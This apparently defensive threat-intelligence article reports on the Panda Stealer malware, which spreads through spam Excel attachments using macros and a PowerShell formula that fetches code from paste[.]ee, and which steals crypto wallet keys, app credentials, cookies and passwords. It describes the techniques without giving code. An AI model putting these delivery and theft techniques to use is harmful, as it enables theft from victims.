A new information stealer has been discovered that is being delivered via spam emails and targets cryptocurrency wallets. This threat is named Panda Stealer and was observed mostly targeting users in the U.S, Germany, Australia, and Japan. The stealer is a modified variant of the Collector Stealer.
What has happened?
According to Trend Micro researchers, the new stealer was discovered in April. The most recent wave of the spam campaign had the biggest impact on Australia, Germany, Japan, and the U.S.
The stealer is spreading via spam emails masquerading as business quote requests to fool victims into clicking on malicious Excel files. Two infection chains are spreading the stealer.
The first one has an ‘.XLSM’ attachment with malicious macros that download a loader. Next, the loader downloads and executes the main stealer.
The second method involves an attached .XLS file with an Excel formula that uses a PowerShell command to access a Pastebin alternative, paste[.]ee, that accesses the second encrypted PowerShell command.
Additional insights
Researchers found 264 files similar to Panda Stealer on VirusTotal and some of them were being shared on Discord.
In addition, the stealer uses the fileless distribution method of the Fair variant of the Phobos ransomware to avoid detection.
Post-infection activities
Once Panda Stealer is successfully deployed, it tries to steal information such as past transactions from cryptocurrency wallets, including Bytecoin, Dash, Ethereum, and Litecoin, along with private keys.
Moreover, it can steal credentials from applications, such as NordVPN, Telegram, Steam, and Discord.
It can take screenshots of the infected system and swipe cookies and passwords from browsers.
